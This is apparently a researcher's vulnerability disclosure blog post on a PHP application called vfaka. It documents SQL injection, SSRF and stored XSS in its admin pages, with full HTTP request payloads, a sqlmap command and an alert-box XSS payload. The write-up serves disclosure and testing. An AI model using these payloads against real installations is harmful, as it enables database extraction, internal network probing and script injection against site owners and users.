vfaka

本文最后更新于 2026年3月4日 下午

vfaka

Test Environment:localhost

windows+apache2+phpstorm+php7.3.4

sql injection

1.Vulnerability analysis

Vulnerability file:/admin/wholesale.php

image-20260304161151462

After receiving the parameter ‘id’, the code did not perform any pre-compilation or filtering operations, and simply concatenated it directly into the SQL statement, resulting in a SQL injection vulnerability.

There are 11 vulnerability points depending on the value of the “type” parameter.

image-20260304163142566

2.Vulnerability exploitation

First, log in to the backend using the administrator account and password.

image-20260304162023928

Construct payload

1
2
3
4
5
6
7
8
9
GET /admin/wholesale.php?action=info&type=text&id=2 HTTP/1.1
Host: 192.168.190.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive

Use sqlmap to verify the vulnerability.

Successfully verified the existence of time blind injection vulnerability and boolean blind injection vulnerability.

1
sqlmap -r '/home/qfbsz/111/daima/vka/sql.txt' --batch -p id

image-20260304163040580

SSRF Vulnerability

1.Vulnerability Analysis

Vulnerability file:/admin/wholesale.php

image-20260304163352819

This code does not perform any security processing on the URL parameters after receiving them, and directly uses the getbody function to make the request, resulting in an SSRF vulnerability.

2.Vulnerability exploitation

First, log in to the backend using the administrator account and password.

image-20260304162023928

Construct payload

url=dict://127.0.0.1:3306

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /admin/wholesale.php?action=list HTTP/1.1
Host: 192.168.190.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

url=dict://127.0.0.1:3306

image-20260304164234127

Successfully detected the internal network port

Stored Cross-Site Scripting vulnerability

1.Vulnerability Analysis

Vulnerability file:/admin/usort_add.php

image-20260304165741452

During the process of obtaining the “S_title” parameter, the “add” operation and the “edit” operation do not convert it into HTML entities and directly concatenate it into the JavaScript code.

image-20260304165827017

2.Vulnerability exploitation

payload:

1
S_title=<script>alert('xss')</script>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /admin/usort_add.php?action=add HTTP/1.1
Host: 192.168.190.1
Content-Length: 165
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.190.1
Referer: http://192.168.190.1/admin/usort_add.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive

S_title=<script>alert('xss')</script>&S_sub=0&S_order=0&S_show=1&S_link_type=default&S_link_url=&S_pic=nopic.png&S_keywords=1&S_content=

image-20260304170922739

After a direct refresh, the XSS vulnerability was successfully triggered.

image-20260304170945235

web
#CVE
vfaka
http://example.com/2026/03/04/vfaka/
作者
清风
发布于
2026年3月4日
许可协议